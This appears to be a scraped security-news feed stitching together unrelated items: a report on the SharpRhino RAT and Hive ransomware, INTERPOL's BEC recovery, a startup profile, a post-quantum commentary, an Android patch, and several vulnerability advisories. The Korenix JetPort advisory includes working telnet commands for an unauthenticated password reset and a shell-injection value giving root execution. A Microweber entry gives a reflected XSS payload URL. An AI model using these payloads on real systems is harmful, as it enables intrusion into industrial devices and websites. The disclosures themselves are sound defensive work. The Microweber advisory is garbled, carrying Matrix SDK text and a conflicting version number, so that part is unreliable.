The RaaS group that distributes Hive ransomware delivers new malware impersonating as validly signed network-administration software to gain initial access and persistence on targeted networks

Source: David Chapman via Alamy Stock Photo

An emerging threat group that's made a meteoric rise to the top of the ransomware food chain has a new tool in its arsenal with a novel remote access Trojan (RAT). The group is using the tool in attacks that appear to be targeting IT professionals.

Researchers from Quorum Cyber revealed in a recent blog post that Hunters International, active since last October, is deploying Hive ransomware. The group uses the new malware, dubbed SharpRhino, first to gain access to targeted infrastructure and then to establish persistence and allow attackers to maintain remote access to the device.

SharpRhino compromises systems disguised as the open source network-administration tool Angry IP Scanner through typosquatting domains. Because Angry IP Scanner is open source, attackers can abuse and misuse valid code-signing certificates to make it look like a network admin is downloading software that has a valid certificate but instead is installing the malware, according to the post.

Upon execution, SharpRhino establishes persistence and provides the attackers with remote access to the device, which they then use to launch a typical ransomware attack using Hive ransomware. Hunters International acquired the malware from its original owners, a group that disbanded after it was taken out by international law enforcement soon after its inception.

"Using previously unseen techniques, the malware is able to obtain a high level of permission on the device in order to ensure the attacker is able to further their targeting with minimal disruption," Quorum Cyber threat intelligence analyst Michael Forret wrote in the post.

**Evolution of a Ransomware Group**

SharpRhino demonstrates the progression of Hunters International, a group linked to Russia. In the first seven months of 2024, the group claimed responsibility for 134 attacks. It has quickly risen to ascendance as the 10th most active ransomware group in 2024 thanks to its possession of Hive.

Leveraging the ransomware, the group has positioned itself as a ransomware-as-a-service (RaaS) provider that works with less sophisticated actors to do much of its dirty work, allowing it to spread Hive more quickly. "Being a RaaS provider is highly likely a main cause for their fast rise to notoriety," Forret wrote.

Like many other ransomware operators, Hunters International exfiltrates data from victim organizations prior to encrypting files, then changes file extensions to .locked and leaves a README message guiding recipients to a chat portal on the Tor network for payment instructions.

"The encryptor itself exhibits a sophisticated design, coded in Rust, a programming language increasingly favoured by cybercriminals for its security features, efficiency, and resistance to reverse engineering," Forret wrote. "This tactic is in line with the evolution observed in the ransomware development, with notable examples including both Hive and BlackCat."

**Disguised as Legitimate Software**

The researchers analyzed a sample of SharpRhino that used a valid certificate signed by the J-Golden Strive Trading Co. Ltd. The file that delivered the malware was a Nullsoft Scriptable Installer System (NSIS)-packed executable, a common file that most compression tools like 7-Zip can understand and read, Forret observed.

The installer system establishes persistence by modifying the Run\\UpdateWindowsKey registry with the shortcut for Microsoft.AnyKey, and establishes two directories on the C:\\ProgramData\\Microsoft — called WindowsUpdater24 and another called LogUpdateWindows — to facilitate multiple channels to Hunters International's command and control (C2) as "a fallback mechanism," Forret noted.

"If the folder WindowsUpdater24 and its contents are discovered by a security engine or professional, there exists the possibility that the persistence mechanism will remain, and the device will remain infected,” he wrote.

Ultimately, SharpRhino's purpose in an attack is to give Hunters International persistence and control over a targeted system to "launch a sophisticated ransomware attack" for financial gain, which the group does without prioritizing any sector or region but instead by targeting "via opportunistic means," Forret wrote.

Qurom Cyber included a list of indicators of compromise for SharpRhino so organizations can identify if network administrators accidentally downloaded the RAT instead of the legitimate tool they believed to be deploying. It also provided Mitre ATT&CK Mapping for the RAT's defense and evasion, discovery, privilege escalation, execution, persistence, and C2 processes.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Hunters International Disguises SharpRhino RAT as Legitimate Network Admin Tool

INTERPOL said it devised a "global stop-payment mechanism" that helped facilitate the largest-ever recovery of funds defrauded in a business email compromise (BEC) scam. 
The development comes after an unnamed commodity firm based in Singapore fell victim to a BEC scam in mid-July 2024. It refers to a type of cybercrime where a malicious actor poses as a trusted figure and uses email to

INTERPOL said it devised a "global stop-payment mechanism" that helped facilitate the largest-ever recovery of funds defrauded in a business email compromise (BEC) scam.

The development comes after an unnamed commodity firm based in Singapore fell victim to a BEC scam in mid-July 2024. It refers to a type of cybercrime where a malicious actor poses as a trusted figure and uses email to trick targets into sending money or divulging confidential company information.

Such attacks can take place in myriad ways, including gaining unauthorized access to a finance employee or a law firm's email account to send fake invoices or impersonating a third-party vendor to email a phony bill.

"On 15 July, the firm had received an email from a supplier requesting that a pending payment be sent to a new bank account based in Timor-Leste," INTERPOL said in a press statement. "The email, however, came from a fraudulent account spelled slightly different to the supplier's official email address."

The Singaporean company is said to have transferred $42.3 million to the non-existent supplier on July 19, only for it to realize the blunder on July 23 after the actual supplier said it had not been compensated.

However, by taking advantage of INTERPOL's Global Rapid Intervention of Payments (I-GRIP) mechanism, authorities in Singapore managed to detect $39 million and froze the counterfeit bank account a day later.

Separately, seven suspects have been arrested in the Southeast Asian nation in connection with the scam, leading to the further recovery of $2 million.

Back in June, I-GRIP was used to trace and intercept the illicit proceeds stemming from fiat and cryptocurrency crime, successfully recovering millions and intercepting hundreds of thousands of BEC accounts as part of a global police operation named First Light.

"Since its launch in 2022, INTERPOL's I-GRIP mechanism has helped law enforcement intercept hundreds of millions of dollars in illicit funds," the agency said.

"INTERPOL is encouraging businesses and individuals to take preventative steps to avoid falling victim to business email compromise and other social engineering scams."

The disclosure follows the law enforcement seizure of an online digital wallet and cryptocurrency exchange known as Cryptonator for allegedly receiving criminal proceeds of computer intrusions and hacking incidents, ransomware scams, various fraud markets, and identity theft schemes.

Cryptonator, launched in December 2013 by Roman Boss, has also been accused of failing to institute appropriate anti-money laundering controls in place. The U.S. Justice Department indicted Boss for founding and operating the service.

Blockchain intelligence firm TRM Labs said the platform facilitated more than 4 million transactions worth a total of $1.4 billion, with Boss taking a small cut from each transaction. This comprised money exchanged with darknet markets, scam wallet addresses, high-risk exchanges, ransomware groups, crypto theft operations, mixers, and sanctioned addresses.

Specifically, cryptocurrency addresses controlled by Cryptonator transacted with darknet markets, virtual exchanges, and criminal marketplaces like Bitzlato, Blender, Finiko, Garantex, Hydra, Nobitex, and an unnamed terrorist entity.

"Hackers, darknet market operators, ransomware groups, sanctions evaders and others threat actors gravitated to the platform to exchange cryptocurrencies as well as cash out crypto into fiat currency," TRM Labs noted.

The popularity of cryptocurrency has created plenty of opportunities for fraud, with threat actors constantly devising new ways to drain victims' wallets over the years.

Indeed, a recent report from Check Point found that fraudsters are abusing legitimate blockchain protocols like Uniswap and Safe.global to conceal their malicious activities and siphon funds from cryptocurrency wallets.

"Attackers leverage the Uniswap Multicall contract to orchestrate fund transfers from victims' wallets to their own," researchers said. "Attackers have been known to use the Gnosis Safe contracts and framework, coaxing unsuspecting victims into signing off on fraudulent transactions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

INTERPOL Recovers $41 Million in Largest Ever BEC Scam in Singapore

Cybersecurity startup RAD Security, a finalist in this year's Black Hat USA Startup Spotlight competition, looks for "drift events," or events that vary from the baseline.

Source: THP Creative via Alamy Stock Photo

Consider these two statistics: By 2025, 95% of new applications will be deployed on cloud-native platforms. And in 2023, 90% of teams working with containers and Kubernetes reported a breach.

RAD Security cites these two figures to illustrate the challenges enterprise defenders face in detecting supply chain and cloud-based attacks. The cybersecurity startup offers a behavioral cloud detection and response solution that generates a "consistent, predictable, behavioral baseline" of an organization's cloud environment in order to detect anomalous activity, according to the company, in response to emailed questions from Dark Reading.

RAD Security calls its approach "behavioral workload fingerprinting." Behavioral fingerprints are represented by the deduplicated hierarchy of programs, processes, and files that a container image exhibits at runtime. RAD Security creates "fingerprints that contain 'golden signals,' created by a proprietary algorithm, with key metrics and behaviors that indicate the health and security status of each container," the company says.

The company looks for "drift events," or those events that don't match the baseline, and adds posture and identity context so that defenders understand what is happening in the environment.

"Anomaly detection is not something you can verify in your environment, as it happens in a black box," the company says. "And there are simply not enough cloud attacks to be able to use machine learning to analyze millions of cloud attacks and find new ones."

This approach is appropriate for clouds because it is transparent and portable, the company says.

The team is currently working on making behavioral fingerprints a de facto standard for how behavioral detection and response is done in cloud security, "all the way from early on in the software supply chain to runtime," RAD Security says.

**Startup Spotlight Finalist**

RAD Security was a Kubernetes Security Operations Center (KSOC) until earlier this year. The name change reflects how the company's scope has evolved beyond being a "best-of-breed Kubernetes Security solution," according to the company. The RAD in RAD Security is not an acronym but references the fact that something radical is technically exciting and "an "irreverence to the status quo," the company says. The name RAD Security is "straightforward, just like the solution we provide."

The four finalists in this year's Black Hat Startup Spotlight competition — DryRun Security, Knostic, LeakSignal, and RAD Security — will present their business models to a panel of judges during the Black Hat USA Conference in Las Vegas on Tuesday, Aug. 6. The judges for this year’s competition are Ketaki Borade (senior analyst, Omdia), Coleen Coolidge (CISO adviser, SF Info Security), Trey Ford (CISO adviser), Hollie Hennessy (senior analyst, Omdia), Maria Markstedter (founder and CEO, Azeria Labs), Lucas Nelson (founding partner, Lytical Ventures), Robert J Stratton III (venture partner, NextGen Venture Partners), and Rik Turner (principal analyst, Omdia). The "Shark Tank"-style competition involves each finalist making a presentation and then answering questions from the panel.

Finalists have the opportunity to demonstrate their technology on the show floor at Black Hat. Visitors to RAD Security's booth will be able to see demonstrations of the platform. The company also announced new features to the platform to "change the way investigations are done in the cloud."

**Startup Brief**

If the company were a band, what would its band name be?

RAD, and our band would be a full experiential show (like the Sphere in Las Vegas) that engages all your senses.

If your company had a mascot, what would the mascot look like?

"Funny you should ask — we have unveiled our new mascot, their name is BRAD!" Brad is a bear that knows how to be rad when it comes to security.

Startup Spotlight: RAD Security Brings Behavioral Profiling to Cloud

A Reflected Cross-site scripting (XSS) vulnerability exists in '/search' in microweber 2.0.15 and earlier allowing unauthenticated remote attackers to inject arbitrary web script or HTML via the 'keywords' parameter.

**Microweber Reflected Cross-site scripting (XSS) vulnerability**

Moderate severity GitHub Reviewed Published Aug 6, 2024 to the GitHub Advisory Database • Updated Aug 6, 2024

GHSA-m99v-mmg2-66vf: Microweber Reflected Cross-site scripting (XSS) vulnerability

### Impact
A malicious homeserver could manipulate a user's account data to cause the client to enable URL previews in end-to-end encrypted rooms, in which case any URLs in encrypted messages would be sent to the server.

Even if the CVSS score would be 4.1 ([AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N&version=3.1)) the maintainer classifies this as High severity issue.

### Patches
This was patched in matrix-react-sdk 3.105.0.

### Workarounds
Deployments that trust their homeservers, as well as closed federations of trusted servers, are not affected.

### References
N/A.


**Impact**

A malicious homeserver could manipulate a user's account data to cause the client to enable URL previews in end-to-end encrypted rooms, in which case any URLs in encrypted messages would be sent to the server.

Even if the CVSS score would be 4.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N) the maintainer classifies this as High severity issue.

**Patches**

This was patched in matrix-react-sdk 3.105.0.

**Workarounds**

Deployments that trust their homeservers, as well as closed federations of trusted servers, are not affected.

**References**

N/A.

**References**

*   GHSA-f83w-wqhc-cfp4

GHSA-f83w-wqhc-cfp4: Matrix SDK for React's URL preview setting for a room is controllable by the HS

The AI boom and increasing popularity of quantum computing necessitates quantum-resilient security.

David O'Berry, vCISO Cyber Resiliency and Enterprise Converged OT/IT/IIoT Cyber, North America Cybersecurity Practice, Capgemini

August 6, 2024

4 Min Read

Source: Science Photo Library via Alamy Stock Photo

COMMENTARY

Quantum computing has been projected to enable market-defining and life-changing capabilities since its inception more than three decades ago. From financial portfolio optimization and improved electric vehicle (EV) battery production to enhanced drug discovery and advanced semiconductor manufacturing, quantum computers can perform complex calculations at faster speeds than both traditional and super computers. 

Thanks to the recent artificial intelligence (AI) boom, quantum computing is predicted to become even more significant in the coming years. Quantum computers will facilitate advancements in AI algorithms — better known as quantum AI or QAI. These quantum-enabled AI models will be faster as well as more accurate and efficient, due to quantum computers' parallel processing abilities that can simultaneously solve complex problems and prepare large datasets. This also means that quantum computing can deliver more energy-efficient AI algorithms, as well as hybrid architecture, neural network-enabled data modeling, and improved AI and data security.

Despite the positivity surrounding quantum computing, there is also a dark side to this burgeoning technology. Cybersecurity criminals are increasingly using quantum computing techniques to attack enterprises and break encryptions. It is believed that in the next five to 10 years, quantum computers will be able to break the majority of today's cryptographic algorithms.

This reality leaves corporate leaders and cybersecurity experts with one choice — prepare for the future of post-quantum cryptography (PQC) before it's too late.

**Current State of Post-Quantum Cryptography**

Encryption has been a highly divisive cybersecurity tool in the United States for several decades. In fact, if it was not for the work of experts like Phil Zimmerman catalyzing public-private discussion during the Crypto Wars, we could be living in a more vulnerable world, where encryption was still widely outlawed. 

Fortunately, after years of debate and a growing onslaught of concerning cyberattacks, cryptography is now a broadly accepted security technique, backed by the US government. Encryption is used to protect everything from emails to cryptocurrencies to private wireless networks. However, of all the cryptographic applications, post-quantum cryptography in particular is now the gold standard.

In 2022, Congress passed the Quantum Computing Cybersecurity Preparedness Act to ensure all federal entities will have quantum-resilient plans and technology in the coming years. The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and National Institute of Standards and Technology (NIST) also collectively developed the "Quantum Readiness: Migration to Post-Quantum Cryptography" information sheet last year, to advise US defense agencies and private enterprises alike on the new reality of cybersecurity in our post-quantum world. 

This surge in PQC legislation is largely due to the fact that most of our existing encryption is weak and cannot withstand a quantum-enabled attack. And while there is some work being done to advance quantum-proof algorithms, it is not nearly enough. Organizations across industries will be subjected to quantum-led attacks, including government agencies, financial and insurance enterprises, government suppliers — such as aerospace and defense companies — and corporations managing critical infrastructure like telcos and utilities. In other words, PQC is a matter of national security and personal privacy. 

**Bolstering Unbreakable Security**

Cyber leaders have always been tasked with preparing for the unpredictable, but now perhaps for the first time, they must prepare for the unknown. Cyber teams have limited knowledge of both quantum-enabled attacks and quantum-resistant encryption. So how can leaders across sectors bolster their defenses in the unfolding era of PQC?

To start, preparations should begin with risk assessments and inventories to help organizations understand where they have cryptographic gaps. Cyber teams should ask themselves where and how they are using encryption. Moreover, they should identify the various kinds of encryption algorithms and their current use cases across the enterprise. This will, in turn, help companies achieve crypto agility across systems. 

Leaders must also enable a cultural and technological reset. Most cybersecurity professionals will need to be trained to identify, mitigate, respond to, and even predict and prevent quantum-driven threats. These upskilling and reskilling initiatives will typically require third-party support from cyber vendors with deep expertise in quantum technologies.

In order to ultimately protect data and secure AI models using post-quantum cryptographic protocols, algorithms, and systems, organizations will also have to revamp their key management strategy, public key infrastructure deployments, and certificate life cycle management practices. 

The AI boom and increasing popularity of quantum computing necessitates quantum-resilient security. The US government has seen the writing on the wall — and now, enterprises must meet the unknown head-on as well. 

**About the Author**

vCISO Cyber Resiliency and Enterprise Converged OT/IT/IIoT Cyber, North America Cybersecurity Practice, Capgemini

David currently leads the vCISO Practice for the Converged OT/IT, Enterprise, and Cyber Resilience Towers for the North America Cybersecurity Practice at Capgemini. In this role, David also works on the creation of Capgemini’s Cybersecurity Delivery Center of Excellence in North America. Most recently, David served as the chief architect for a large North American utility, helping to lead a $100 million-plus cybersecurity transformation initiative. David has more than 30 years of experience in IT, OT, converged IT/OT, network security, and consulting services.

Preparing for the Future of Post-Quantum Cryptography

Korenix JetPort Series version 1.2 suffers from insufficient authentication, command injection, and plaintext communication vulnerabilities.

CyberDanube Security Research 20240805-0  
-------------------------------------------------------------------------------  
                title| Multiple Vulnerabilities in JetPort Series  
              product| Korenix JetPort Series  
   vulnerable version| 1.2  
        fixed version| None  
           CVE number| CVE-2024-7395, CVE-2024-7396, CVE-2024-7397  
               impact| High  
             homepage| https://www.korenix.com/  
                found| 2024-04-01  
                   by| S. Dietz (Office Vienna)  
                     | CyberDanube Security Research  
                     | Vienna | St. Pölten  
                     |  
                     | https://www.cyberdanube.com  
-------------------------------------------------------------------------------

Vendor description  
-------------------------------------------------------------------------------  
"Korenix Technology, a Beijer group company within the Industrial Communication  
business area, is a global leading manufacturer providing innovative, market-  
oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
With decades of experiences in the industry, we have developed various product  
lines [...].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-  
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer  
base covers different Sales channels, including end-customers, OEMs, system  
integrators, and brand label partners. [...]"

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions  
-------------------------------------------------------------------------------  
Korenix JetPort 5601v3 / v1.2

Vulnerability overview  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The configuration service on port 600/tcp doesnt require authentication to be  
used. This allows an attacker to change the password or other critical  
information.

2) Plaintext Communication (CVE-2024-7396)  
The communication of the configuration service is transmitted in plain text.  
An attacker could use this information to sniff passwords or other critical  
information.

3) Unauthenticated Command Injection (CVE-2024-7397)  
An attacker with network access an can execute arbitrary commands as root user  
via the management service on port 600/tcp.

Proof of Concept  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The management software JetPort Commander is used as an frontend for the telnet  
service on 600/tcp. While it is possible to set a password, the passwords gets  
sent to the software in cleartext and gets validated on the client software  
rather than on the device. An attacker can bypass the management software by  
using telnet to directly connect to the port. This allows him to reconfigure  
the device including passwords and access controls.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setpassword poc

target:/$ cat /tmp/com2ip.conf  
version:1.2.0  
model:JetPort5601v3  
name:JetPort5601v3-DEFAULT  
serialno:0000000000000000  
password:poc  
switchmode:redundant  
network:static:192.168.122.76:192.168.10.1:192.168.10.1

2) Plaintext Communication (CVE-2024-7396)  
The management service uses telnet as protocol. We used tcpdump to inspect the  
traffic during a password change. The new password (newpass) is readable during  
transmission.

# sudo tcpdump -i virbr0 dst port 600 -X  
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21  
      0x0000:  4500 003d 16a7 4000 8006 6d86 c0a8 7af0  E..=..@...m...z.  
      0x0010:  c0a8 7a4c c1c0 0258 522b 6096 12eb 337d  ..zL...XR+`...3}  
      0x0020:  5018 4026 76bd 0000 7365 7470 6173 7377  P.@&v...setpassw  
      0x0030:  6f72 6420 6e65 7770 6173 730d 0a         ord.newpass..

3) Unauthenticated Remote Code Execution (CVE-2024-7397)  
The management service on port 600/tcp is used to configure JetPort devices  
over the network. An attacker can inject arbitrary commands in multiple  
settings options. The binary ser2net receives the data via the telnet  
protocol and translates it to arguments for system() calls. For our PoC we  
used the setsntp option to create the file /tmp/pwned.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1  
OK  
->

target:/$ ls -rtlha /tmp/  
drwxrwxr-x   17 root     0            1.0k Apr  4 10:41 ..  
-rw-r--r--    1 root     0               4 Apr  4 12:28 thttpd.pid  
-rw-r--r--    1 root     0             712 Apr  4 12:29 com2ip.conf  
-rw-r--r--    1 root     0               0 Apr  4 12:33 pwned  
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the  
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution  
-------------------------------------------------------------------------------  
None. Device is End-of-Life.

Workaround  
-------------------------------------------------------------------------------  
Limit the access to the device and place it within a segmented network.

Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends customers from Korenix to remove the device from their  
network topology.

Contact Timeline  
-------------------------------------------------------------------------------  
2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.  
2024-05-07: Received confirmation that the issue is beeing looked into.  
2024-06-10: Contact stated that the product is considered EoL and will no  
            longer receive security updates.  
2024-06-10: Confirm receipt and telling them that we will publish the  
            advisory after our 90-days deadline.  
2024-08-05: Publication of the Advisory.

Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com

EOF Sebastian Dietz / @2024

Korenix JetPort Series 1.2 Command Injection / Insufficient Authentication

Google has issued security updates for 46 vulnerabilities, including a patch for a remote code execution flaw which has been used in limited targeted attacks.

Google has released patches for 46 vulnerabilities in Android, including a remote code execution (RCE) vulnerability that it says has been used in limited, targeted attacks.

You can find your device’s Android version number, security update level, and Google Play system level in your Settings app. You’ll get notifications when updates are available for you, but you can also check for updates.

If your Android phone is at patch level 2024-08-01 or later then the issues discussed below have been fixed. The updates have been made available for Android 12, 12L, 13, and 14. Android partners, such as Samsung, Sony, etc, are notified of all issues at least a month before publication, however, this doesn’t always mean that the patches are available for devices from all vendors.

For most Android devices, you can check for new updates like this: Under **About phone** or **About device** you can tap on **Software updates**, although there may be slight differences based on the brand, type, and Android version.

**Technical details**

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The actively exploited vulnerability is listed as:

CVE-2024-36971 is a use after free (UAF) vulnerability in the Linux kernel. The vulnerability could lead to remote code execution with System execution privileges needed.

This Linux kernel vulnerability affects the Android OS because the Android kernel is based on an upstream Linux Long Term Supported (LTS) kernel. This kernel is like the engine of the operating system, managing the hardware and basic functions.

The Android kernel is based on a version of the Linux kernel, which is a popular core for many operating systems. Specifically, Android uses a version of the Linux kernel that is designated as “Long Term Supported” (LTS). This means it’s a version that gets updates and fixes for a longer period than regular versions, ensuring it stays secure and stable over time.

UAF is a type of vulnerability that happens when a program incorrectly handles its memory. When a program frees up a piece of memory but still tries to use it afterward, an attacker can exploit this mistake. This can cause the program to crash, behave unpredictably, or even run harmful code. In this case it allows the attacker to remotely execute code on the device if they have enough privileges.

Attackers would need to gain the needed privileges to use this vulnerability by combining it with other vulnerabilities.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 Android vulnerability used in targeted attacks patched by Google 

Microweber version 1.0 suffers from a cross site scripting vulnerability in the search functionality. Original discovery of cross site scripting in this version is attributed to tmrswrr in June of 2024.

    # Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)# Date: 16.07.2024# Exploit Author: Prerak Mittal# Vendor Homepage: https://microweber.org/# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15# Version: <=v2.0.15# Tested on: Ubuntu 22.04# CVE : CVE-2024-40101# Description:## App Installation:1. Clone the repository and build the application using docker:```git clone -b v2.0.15 https://github.com/microweber/microweber.gitcd microweberdocker compose up -d```2. Visit http://localhost3. Follow along the UI installation process.## Steps to reproduce:1. Visit http://localhost/search2. Insert the below payload in `keywords` parameter:  "onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"  Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22  3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.

Microweber 2.0.15 Cross Site Scripting

Gentoo Linux Security Advisory 202408-2 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could lead to remote code execution. Versions greater than or equal to 115.12.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: August 06, 2024  
     Bugs: #930380, #932374, #935550  
       ID: 202408-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could lead to remote code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

Package                 Vulnerable      Unaffected  
----------------------  --------------  ---------------  
www-client/firefox      < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid  
www-client/firefox-bin  < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-127.0:rapid"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-127.0:rapid"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.12.0:esr"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.12.0:esr"

References  
==========

[ 1 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 2 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 3 ] CVE-2024-3853  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3853  
[ 4 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 5 ] CVE-2024-3855  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3855  
[ 6 ] CVE-2024-3856  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3856  
[ 7 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 8 ] CVE-2024-3858  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3858  
[ 9 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 10 ] CVE-2024-3860  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3860  
[ 11 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 12 ] CVE-2024-3862  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3862  
[ 13 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864  
[ 14 ] CVE-2024-3865  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3865  
[ 15 ] CVE-2024-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4764  
[ 16 ] CVE-2024-4765  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4765  
[ 17 ] CVE-2024-4766  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4766  
[ 18 ] CVE-2024-4771  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4771  
[ 19 ] CVE-2024-4772  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4772  
[ 20 ] CVE-2024-4773  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4773  
[ 21 ] CVE-2024-4774  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4774  
[ 22 ] CVE-2024-4775  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4775  
[ 23 ] CVE-2024-4776  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4776  
[ 24 ] CVE-2024-4778  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4778  
[ 25 ] CVE-2024-5689  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5689  
[ 26 ] CVE-2024-5693  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5693  
[ 27 ] CVE-2024-5694  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5694  
[ 28 ] CVE-2024-5695  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5695  
[ 29 ] CVE-2024-5696  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5696  
[ 30 ] CVE-2024-5697  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5697  
[ 31 ] CVE-2024-5698  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5698  
[ 32 ] CVE-2024-5699  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5699  
[ 33 ] CVE-2024-5700  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5700  
[ 34 ] CVE-2024-5701  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5701  
[ 35 ] CVE-2024-5702  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5702  
[ 36 ] MFSA-2024-25  
[ 37 ] MFSA-2024-26  
[ 38 ] MFSA-2024-28

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Latest News